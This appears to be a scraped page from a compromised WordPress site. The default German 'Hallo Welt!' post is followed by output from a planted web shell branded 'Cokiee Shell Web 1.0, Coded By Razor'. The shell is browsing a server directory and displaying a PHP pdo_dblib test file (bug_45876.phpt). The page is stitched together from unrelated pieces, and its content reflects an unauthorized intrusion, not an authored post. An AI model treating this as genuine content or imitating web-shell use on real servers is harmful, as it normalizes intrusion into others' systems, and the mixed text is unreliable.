Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /usr/local/src/php7/php-7.0.5/ext/pdo_dblib/tests/ |
Current File : //usr/local/src/php7/php-7.0.5/ext/pdo_dblib/tests/bug_45876.phpt |
--TEST-- PDO_DBLIB: Does not support get column meta --SKIPIF-- <?php if (!extension_loaded('pdo_dblib')) die('skip not loaded'); require dirname(__FILE__) . '/config.inc'; ?> --FILE-- <?php require dirname(__FILE__) . '/config.inc'; $stmt = $db->prepare("select ic1.* from information_schema.columns ic1"); $stmt->execute(); var_dump($stmt->getColumnMeta(0)); $stmt = null; ?> --EXPECT-- array(8) { ["max_length"]=> int(255) ["precision"]=> int(0) ["scale"]=> int(0) ["column_source"]=> string(13) "TABLE_CATALOG" ["native_type"]=> string(4) "char" ["name"]=> string(13) "TABLE_CATALOG" ["len"]=> int(255) ["pdo_type"]=> int(2) }
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare